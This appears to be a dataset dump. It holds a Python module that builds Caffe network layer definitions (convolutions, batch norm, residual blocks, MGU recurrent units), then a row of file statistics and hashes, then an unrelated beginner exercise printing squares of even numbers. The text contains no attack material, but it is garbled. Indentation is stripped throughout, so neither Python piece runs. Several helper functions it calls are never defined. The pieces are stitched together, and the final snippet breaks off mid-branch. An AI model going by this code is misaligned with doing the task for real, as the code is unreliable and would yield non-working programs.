def get_bn(name='',bottom='',top='',use_global_stas=0):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'BatchNorm'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
ss += ' lr_mult: 0\n }\n'
ss += ' param {\n'
ss += ' lr_mult: 0\n }\n'
ss += ' param {\n'
ss += ' lr_mult: 0\n }\n'
ss += ' batch_norm_param {\n'
ss += ' use_global_stats:'+str(use_global_stas)+'\n'
ss += ' }\n'
ss+='}\n'
return ss
def get_power(name='',bottom='',top='',scale=1,shift=0,power=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Power'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' power_param {\n'
ss += ' scale:'+str(scale)+'\n'
ss += ' shift:'+str(shift)+'\n'
ss += ' power:'+str(power)+'\n'
ss += ' }\n'
ss+='}\n'
return ss
def get_domaintransform(name='',bottom='',top=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'DomainTransform'+'"\n'
for b in bottom:
ss += ' bottom:"'+b+'"\n'
ss += ' top:"'+top+'"\n'
ss+='}\n'
return ss
def get_pool(name='',bottom='',top='',pooltype='',ksize=2,pad=0,stride=2):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Pooling'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' pooling_param {\n'
ss += ' pool:'+pooltype+'\n'
if type(ksize) == list:
ss += ' kernel_h:'+str(ksize[0])+'\n'
ss += ' kernel_w:'+str(ksize[1])+'\n'
else:
ss += ' kernel_size:'+str(ksize)+'\n'
if type(pad) == list:
ss += ' pad_h:'+str(pad[0])+'\n'
ss += ' pad_w:'+str(pad[1])+'\n'
else:
ss += ' pad:'+str(pad)+'\n'
if type(stride) == list:
ss += ' stride_h:'+str(stride[0])+'\n'
ss += ' stride_w:'+str(stride[1])+'\n'
else:
ss += ' stride:'+str(stride)+'\n'
ss += ' }\n}\n'
return ss
def get_active(name='',bottom='',top='',typename='PReLU'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+typename+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
if typename == 'PReLU':
ss += ' prelu_param {\n'
ss += ' filler {\n\
type: "gaussian"\n\
std: 0.03\n }\n }\n'
ss+='}\n'
return ss
def get_conv(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Convolution'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_w)>0:
ss+=' name:"'+paramname_w+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' convolution_param {\n'
ss += ' num_output:'+str(numoutput)+'\n'
if type(ksize) == list:
ss += ' kernel_h:'+str(ksize[0])+'\n'
ss += ' kernel_w:'+str(ksize[1])+'\n'
else:
ss += ' kernel_size:'+str(ksize)+'\n'
if type(pad) == list:
ss += ' pad_h:'+str(pad[0])+'\n'
ss += ' pad_w:'+str(pad[1])+'\n'
else:
ss += ' pad:'+str(pad)+'\n'
if type(stride) == list:
ss += ' stride_h:'+str(stride[0])+'\n'
ss += ' stride_w:'+str(stride[1])+'\n'
else:
ss += ' stride:'+str(stride)+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_deconv(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Deconvolution'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_w)>0:
ss+=' name:"'+paramname_w+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' convolution_param {\n'
ss += ' num_output:'+str(numoutput)+'\n'
if type(ksize) == list:
ss += ' kernel_h:'+str(ksize[0])+'\n'
ss += ' kernel_w:'+str(ksize[1])+'\n'
else:
ss += ' kernel_size:'+str(ksize)+'\n'
if type(pad) == list:
ss += ' pad_h:'+str(pad[0])+'\n'
ss += ' pad_w:'+str(pad[1])+'\n'
else:
ss += ' pad:'+str(pad)+'\n'
if type(stride) == list:
ss += ' stride_h:'+str(stride[0])+'\n'
ss += ' stride_w:'+str(stride[1])+'\n'
else:
ss += ' stride:'+str(stride)+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_conv_active(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_conv(name=name,bottom=bottom,top=top,ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_active(name=name+'_active',bottom=top,top=top,typename=active)
return s
def get_deconv_active(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_deconv(name=name,bottom=bottom,top=top,ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_active(name=name+'_active',bottom=top,top=top,typename=active)
return s
def get_sprnn(name='',bottom='',top='',paramname_w='',paramname_b='',horizontal='true',reverse='false',restrict_w=-1,active='LINEAR'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'SpatialRecurrent'+'"\n'
if type(bottom) == list:
ss += ' bottom:"'+bottom[0]+'"\n'
ss += ' bottom:"'+bottom[1]+'"\n'
else:
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_w)>0:
ss+=' name:"'+paramname_w+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' spatialrecurrent_param {\n'
ss += ' horizontal:'+horizontal+'\n'
ss += ' reverse:'+reverse+'\n'
ss += ' restrict_w:'+str(restrict_w)+'\n'
ss += ' active:'+active+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_gaternn(name='',bottom='',top='',num_output=1,use_wx='false',use_wh='false',use_bias='false',paramname_wx='',paramname_wh='',paramname_b='',
horizontal='true',reverse='false',restrict_w=-1,restrict_g=1,use_x_gate='true',use_new_fix='true',active='LINEAR'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'GateRecurrent'+'"\n'
if type(bottom) == list:
ss += ' bottom:"'+bottom[0]+'"\n'
ss += ' bottom:"'+bottom[1]+'"\n'
else:
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_wx)>0:
ss+=' name:"'+paramname_wx+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_wh)>0:
ss+=' name:"'+paramname_wh+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' gaterecurrent_param {\n'
ss += ' num_output:'+str(num_output)+'\n'
ss += ' horizontal:'+horizontal+'\n'
ss += ' reverse:'+reverse+'\n'
ss += ' restrict_w:'+str(restrict_w)+'\n'
ss += ' active:'+active+'\n'
ss += ' restrict_g:'+str(restrict_g)+'\n'
ss += ' use_wx:'+use_wx+'\n'
ss += ' use_wh:'+use_wh+'\n'
ss += ' use_bias:'+use_bias+'\n'
ss += ' use_x_gate:'+use_x_gate+'\n'
ss += ' use_new_fix:'+use_new_fix+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_conv_bn(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_conv(name=name+'_conv',bottom=bottom,top=name+'_conv',ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_bn(name=name+'_bn',bottom=name+'_conv',top=name+'_bn')
s+=get_active(name=top,bottom=top+'_bn',top=top,typename=active)
return s
def get_deconv_bn(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_deconv(name=name+'_deconv',bottom=bottom,top=name+'_deconv',ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_bn(name=name+'_bn',bottom=name+'_deconv',top=name+'_bn')
s+=get_active(name=top,bottom=name+'_bn',top=top,typename=active)
return s
def get_res_unit(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_bn(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch/2,pad=0,stride=1,active=active)
ss+=get_conv_bn(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=1,active=active)
ss+=get_conv_bn(name=name+'_conv1_3',bottom=name+'_conv1_2',top=name+'_conv1_3',ksize=3,numoutput=ch,pad=1,stride=1,active=active)
ss += get_conv_bn(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss += get_eltwise(name=top,bottom=[name+'_input',name+'_conv1_3'],top=top,typename='SUM')
return ss
def get_res_unit_stride2(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_bn(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss+=get_conv_bn(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=2,active=active)
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=2,active=active)
ss += get_eltwise(name=top,bottom=[name+'_input',name+'_conv1_2'],top=top,typename='SUM')
return ss
def get_res_unit_upsample2(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_deconv_bn(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss+=get_deconv_bn(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=4,numoutput=ch,pad=1,stride=2,active=active)
ss += get_deconv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=4,numoutput=ch,pad=1,stride=2,active=active)
ss += get_eltwise(name=top,bottom=[name+'_input',name+'_conv1_2'],top=top,typename='SUM')
return ss
def get_insec_small(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_active(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch/2,pad=0,stride=1,active=active)
ss+=get_conv_active(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=1,active=active)
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_conv1_2'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top,use_global_stas=0)
return ss
def get_insec_stride2_small(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_active(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss+=get_conv_active(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=2,active=active)
#ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
#ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_conv1_2'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_conv1_2',top= top,use_global_stas=0)
return ss
def get_insec(name='',bottom='',top='', ch=1):
ss=''
ss += get_conv_active(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch/2,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv2_1',bottom=bottom,top=name+'_conv2_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv2_2',bottom=name+'_conv2_1',top=name+'_conv2_2',ksize=3,numoutput=ch,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_1',bottom=bottom,top=name+'_conv3_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_2',bottom=name+'_conv3_1',top=name+'_conv3_2',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_3',bottom=name+'_conv3_2',top=name+'_conv3_3',ksize=3,numoutput=ch,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_1',bottom=bottom,top=name+'_conv4_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_2',bottom=name+'_conv4_1',top=name+'_conv4_2',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_3',bottom=name+'_conv4_2',top=name+'_conv4_3',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_4',bottom=name+'_conv4_3',top=name+'_conv4_4',ksize=3,numoutput=ch,pad=1,stride=1,active="ReLU")
ss += get_concat(name=name+'_concat',bottom=[name+'_conv1_2',name+'_conv2_2',name+'_conv3_3',name+'_conv4_4'],top =name+'_concat')
ss += get_conv_active(name=name+'_convall',bottom=name+'_concat',top=name+'_convall',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_convall'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top)
return ss
def get_insec_stride2(name='',bottom='',top='', ch=1):
ss=''
ss += get_conv_active(name=name+'_conv2_1',bottom=bottom,top=name+'_conv2_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv2_2',bottom=name+'_conv2_1',top=name+'_conv2_2',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
ss += get_conv_active(name=name+'_conv3_1',bottom=bottom,top=name+'_conv3_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_2',bottom=name+'_conv3_1',top=name+'_conv3_2',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_3',bottom=name+'_conv3_2',top=name+'_conv3_3',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
ss += get_concat(name=name+'_concat',bottom=[name+'_conv2_2',name+'_conv3_3'],top =name+'_concat')
ss += get_conv_active(name=name+'_convall',bottom=name+'_concat',top=name+'_convall',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_convall'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top)
return ss
def get_INS(name='',bottom='',top='', ch=1):
ss=''
ss += get_insec(name=name+'_ins1',bottom=bottom,top=name+'_ins1',ch=ch)
ss += get_insec(name=name+'_ins2_1',bottom=bottom,top=name+'_ins2_1',ch=ch/2)
ss += get_insec(name=name+'_ins2_1',bottom=name+'_ins2_1',top=name+'_ins2_2',ch=ch)
ss += get_insec(name=name+'_ins3_1',bottom=bottom,top=name+'_ins3_1',ch=ch)
ss += get_insec(name=name+'_ins3_2',bottom=name+'_ins3_1',top=name+'_ins3_2',ch=ch/2)
ss += get_insec(name=name+'_ins3_3',bottom=name+'_ins3_2',top=name+'_ins3_3',ch=ch)
ss += get_eltwise(name=name+'_sum',bottom=[name+'_ins1',name+'_ins2_2',name+'_ins3_3'],top=name+'_sum',typename='MAX')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top)
return ss
def get_MGU(name='',bottom='',top='',seqlength=0,ksize=3,numoutput=1,shareparam=0):
prefix='MGU_'+name+'_'
ss=''
name={}
for i in range(1,seqlength+1):
name['f'+str(i)]=prefix+'f1'
x=[]
h=[]
f=[]
ft_convht_1=[]
ft_convxt=[]
ft_beforeactive=[]
ht_hat=[]
ht_hat_beforeactive=[]
ht_hat_ftdotht_1=[]
ht_hat_convftdotht_1=[]
ht_hat_convxt=[]
#ht_hat_sum=[]
ht_1_ft=[]
ht_1_ft_dotht_1=[]
ht_ftdotht_hat=[]
for i in range(0,seqlength+1):
x.append(prefix+'x'+str(i))
h.append(prefix+'h'+str(i))
f.append(prefix+'f'+str(i))
ft_convht_1.append(prefix+'f'+str(i)+'_convh'+str(i-1))
ft_convxt.append(prefix + 'f'+str(i)+'_convx'+str(i))
ht_hat.append(prefix+'h'+str(i)+'_hat')
ht_hat_ftdotht_1.append(prefix+'h'+str(i)+'_hat_f'+str(i)+'_dot_h'+str(i-1))
ht_hat_convxt.append(prefix+'h'+str(i)+'_hat_convx'+str(i))
ht_1_ft.append(prefix+'h'+str(i)+'_1_f'+str(i))
ht_1_ft_dotht_1.append(prefix+'h'+str(i)+'_1_f'+str(i)+'_dot_h'+str(i-1))
ht_ftdotht_hat.append(prefix+'h'+str(i)+'_f'+str(i)+'_dot_h'+str(i)+'_hat')
ft_beforeactive.append(prefix+'f'+str(i)+'_beforeactive')
ht_hat_beforeactive.append(prefix+'h'+str(i)+'_hat_beforeactive')
ht_hat_convftdotht_1.append(prefix+'h'+str(i)+'_hat_conv_f'+str(i)+'_dot_h'+str(i-1))
slice_point=[i for i in range(1,seqlength)]
param_f_h_w=''
param_f_h_b=''
param_f_x_w=''
param_f_x_b=''
param_hat_h_w=''
param_hat_h_b=''
param_hat_x_w=''
param_hat_x_b=''
if shareparam:
param_f_h_w=prefix+'f_h_w'
param_f_h_b=prefix+'f_h_b'
param_f_x_w=prefix+'f_x_w'
param_f_x_b=prefix+'f_x_b'
param_hat_h_w=prefix+'hat_h_w'
param_hat_h_b=prefix+'hat_h_b'
param_hat_x_w=prefix+'hat_x_w'
param_hat_x_b=prefix+'hat_x_b'
#slice x
ss += get_slice(name=prefix+'slice',bottom=bottom,top=x[1:],slice_point=slice_point,slice_dim=0)
#get f1 = sigm(conv(x1))
ss += get_conv_active(name=f[1],bottom=x[1],top=f[1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_x_w,paramname_b=param_f_x_b,active="Sigmoid")
#get h1_hat = tanh(conv(x1))
ss += get_conv_active(name=ht_hat[1],bottom=x[1],top=ht_hat[1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_x_w,paramname_b=param_hat_x_b,active="TanH")
#get h1 = f1.*h1_hat
ss += get_eltwise(name=h[1],bottom=[f[1],ht_hat[1]],top=h[1],typename='PROD')
for i in range(2,seqlength+1):
#get fi = sigm(conv(ht-1) + conv(xt))
ss += get_conv(name=ft_convht_1[i],top=ft_convht_1[i],bottom=h[i-1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_h_w,paramname_b=param_f_h_b)
ss += get_conv(name=ft_convxt[i],top=ft_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_x_w,paramname_b=param_f_x_b)
ss += get_eltwise(name=ft_beforeactive[i],top=ft_beforeactive[i],bottom=[ft_convht_1[i],ft_convxt[i]],typename='SUM')
ss += get_active(name=f[i],top=f[i],bottom=ft_beforeactive[i],typename='Sigmoid')
#get hi_hat = tanh(conv(fi.*hi-1) + conv(xi))
ss += get_eltwise(name=ht_hat_ftdotht_1[i],bottom=[f[i],h[i-1]],top=ht_hat_ftdotht_1[i],typename='PROD')
ss += get_conv(name=ht_hat_convftdotht_1[i],top=ht_hat_convftdotht_1[i],bottom=ht_hat_ftdotht_1[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_h_w,paramname_b=param_hat_h_b)
ss += get_conv(name=ht_hat_convxt[i],top=ht_hat_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_x_w,paramname_b=param_hat_x_b)
ss += get_eltwise(name=ht_hat_beforeactive[i],top=ht_hat_beforeactive[i],bottom=[ht_hat_convftdotht_1[i],ht_hat_convxt[i]],typename='SUM')
ss += get_active(name=ht_hat[i],top=ht_hat[i],bottom=ht_hat_beforeactive[i],typename='TanH')
#get hi = (1-fi).*hi-1 + fi.*hi_hat
ss += get_power(name=ht_1_ft[i],top=ht_1_ft[i],bottom=f[i],scale=-1,shift=1,power=1)
ss += get_eltwise(name=ht_1_ft_dotht_1[i],bottom=[ht_1_ft[i],h[i-1]],top=ht_1_ft_dotht_1[i],typename='PROD')
ss += get_eltwise(name=ht_ftdotht_hat[i],bottom=[f[i],ht_hat[i]],top=ht_ftdotht_hat[i],typename='PROD')
ss += get_eltwise(name=h[i],bottom=[ht_1_ft_dotht_1[i],ht_ftdotht_hat[i]],top=h[i],typename='SUM')
ss += get_concat(name=top,top=top,bottom =h[1:] ,concat_dim=0)
#ss += get_conv(name=prefix+'conv_ft_ht-1'+str(i),bottom=top[1],top=prefix+'f1',ksize=ksize,numoutput=numoutput,pad=1,stride=1,paramname_w='',paramname_b='')
return ss
def get_MGU2(name='',bottom='',top='',seqlength=0,ksize=3,numoutput=1,shareparam=0):
prefix='MGU_'+name+'_'
ss=''
name={}
for i in range(1,seqlength+1):
name['f'+str(i)]=prefix+'f1'
x=[]
h=[]
f=[]
ft_convht_1=[]
ft_convxt=[]
ft_beforeactive=[]
ht_hat=[]
ht_hat_beforeactive=[]
ht_hat_ftdotht_1=[]
ht_hat_convftdotht_1=[]
ht_hat_convxt=[]
#ht_hat_sum=[]
ht_1_ft=[]
ht_1_ft_dotht_1=[]
ht_ftdotht_hat=[]
for i in range(0,seqlength+1):
x.append(prefix+'x'+str(i))
h.append(prefix+'h'+str(i))
f.append(prefix+'f'+str(i))
ft_convht_1.append(prefix+'f'+str(i)+'_convh'+str(i-1))
ft_convxt.append(prefix + 'f'+str(i)+'_convx'+str(i))
ht_hat.append(prefix+'h'+str(i)+'_hat')
ht_hat_ftdotht_1.append(prefix+'h'+str(i)+'_hat_f'+str(i)+'_dot_h'+str(i-1))
ht_hat_convxt.append(prefix+'h'+str(i)+'_hat_convx'+str(i))
ht_1_ft.append(prefix+'h'+str(i)+'_1_f'+str(i))
ht_1_ft_dotht_1.append(prefix+'h'+str(i)+'_1_f'+str(i)+'_dot_h'+str(i-1))
ht_ftdotht_hat.append(prefix+'h'+str(i)+'_f'+str(i)+'_dot_h'+str(i)+'_hat')
ft_beforeactive.append(prefix+'f'+str(i)+'_beforeactive')
ht_hat_beforeactive.append(prefix+'h'+str(i)+'_hat_beforeactive')
ht_hat_convftdotht_1.append(prefix+'h'+str(i)+'_hat_conv_f'+str(i)+'_dot_h'+str(i-1))
slice_point=[i for i in range(1,seqlength)]
param_f_h_w=''
param_f_h_b=''
param_f_x_w=''
param_f_x_b=''
param_hat_h_w=''
param_hat_h_b=''
param_hat_x_w=''
param_hat_x_b=''
if shareparam:
param_f_h_w=prefix+'f_h_w'
param_f_h_b=prefix+'f_h_b'
param_f_x_w=prefix+'f_x_w'
param_f_x_b=prefix+'f_x_b'
param_hat_h_w=prefix+'hat_h_w'
param_hat_h_b=prefix+'hat_h_b'
param_hat_x_w=prefix+'hat_x_w'
param_hat_x_b=prefix+'hat_x_b'
#slice x
ss += get_slice(name=prefix+'slice',bottom=bottom,top=x[1:],slice_point=slice_point,slice_dim=0)
for i in range(1,seqlength+1):
#get fi = sigm(conv(ht-1) + conv(xt))
ss += get_conv(name=ft_convht_1[i],top=ft_convht_1[i],bottom=h[i-1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_h_w,paramname_b=param_f_h_b)
ss += get_conv(name=ft_convxt[i],top=ft_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_x_w,paramname_b=param_f_x_b)
ss += get_eltwise(name=ft_beforeactive[i],top=ft_beforeactive[i],bottom=[ft_convht_1[i],ft_convxt[i]],typename='SUM')
ss += get_active(name=f[i],top=f[i],bottom=ft_beforeactive[i],typename='Sigmoid')
#get hi_hat = tanh(conv(fi.*hi-1) + conv(xi))
ss += get_eltwise(name=ht_hat_ftdotht_1[i],bottom=[f[i],h[i-1]],top=ht_hat_ftdotht_1[i],typename='PROD')
ss += get_conv(name=ht_hat_convftdotht_1[i],top=ht_hat_convftdotht_1[i],bottom=ht_hat_ftdotht_1[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_h_w,paramname_b=param_hat_h_b)
ss += get_conv(name=ht_hat_convxt[i],top=ht_hat_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_x_w,paramname_b=param_hat_x_b)
ss += get_eltwise(name=ht_hat_beforeactive[i],top=ht_hat_beforeactive[i],bottom=[ht_hat_convftdotht_1[i],ht_hat_convxt[i]],typename='SUM')
ss += get_active(name=ht_hat[i],top=ht_hat[i],bottom=ht_hat_beforeactive[i],typename='TanH')
#get hi = (1-fi).*hi-1 + fi.*hi_hat
ss += get_power(name=ht_1_ft[i],top=ht_1_ft[i],bottom=f[i],scale=-1,shift=1,power=1)
ss += get_eltwise(name=ht_1_ft_dotht_1[i],bottom=[ht_1_ft[i],h[i-1]],top=ht_1_ft_dotht_1[i],typename='PROD')
ss += get_eltwise(name=ht_ftdotht_hat[i],bottom=[f[i],ht_hat[i]],top=ht_ftdotht_hat[i],typename='PROD')
ss += get_eltwise(name=h[i],bottom=[ht_1_ft_dotht_1[i],ht_ftdotht_hat[i]],top=h[i],typename='SUM')
ss += get_concat(name=top,top=top,bottom =h[1:] ,concat_dim=0)
#ss += get_conv(name=prefix+'conv_ft_ht-1'+str(i),bottom=top[1],top=prefix+'f1',ksize=ksize,numoutput=numoutput,pad=1,stride=1,paramname_w='',paramname_b='')
return ss
| 32.413242 | 211 | 0.63767 | 4,978 | 28,394 | 3.398152 | 0.032744 | 0.032454 | 0.023942 | 0.030149 | 0.879877 | 0.866162 | 0.856763 | 0.848191 | 0.828328 | 0.803145 | 0 | 0.025155 | 0.119356 | 28,394 | 875 | 212 | 32.450286 | 0.65135 | 0.030887 | 0 | 0.725589 | 0 | 0 | 0.185915 | 0.0008 | 0.031987 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.003367 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1e5a9f22f7c175cddddb991d4c493f778c9f794d | 305 | py | Python | Python/Uri 1073 - Quadrado de Pares.py | Gui25Reis/URI | 3df11b4eb27513b336bdff1e56b7707568b249e3 | [
"MIT"
] | null | null | null | Python/Uri 1073 - Quadrado de Pares.py | Gui25Reis/URI | 3df11b4eb27513b336bdff1e56b7707568b249e3 | [
"MIT"
] | null | null | null | Python/Uri 1073 - Quadrado de Pares.py | Gui25Reis/URI | 3df11b4eb27513b336bdff1e56b7707568b249e3 | [
"MIT"
] | null | null | null | N = int(input())
if N % 2 == 0:
for num_pares in range(2, N+1, 2):
par_quadrado = num_pares**2
print('{}^2 = {}'.format(num_pares, par_quadrado))
else:
for num_pares in range(2, N+1, 2):
par_quadrado = num_pares**2
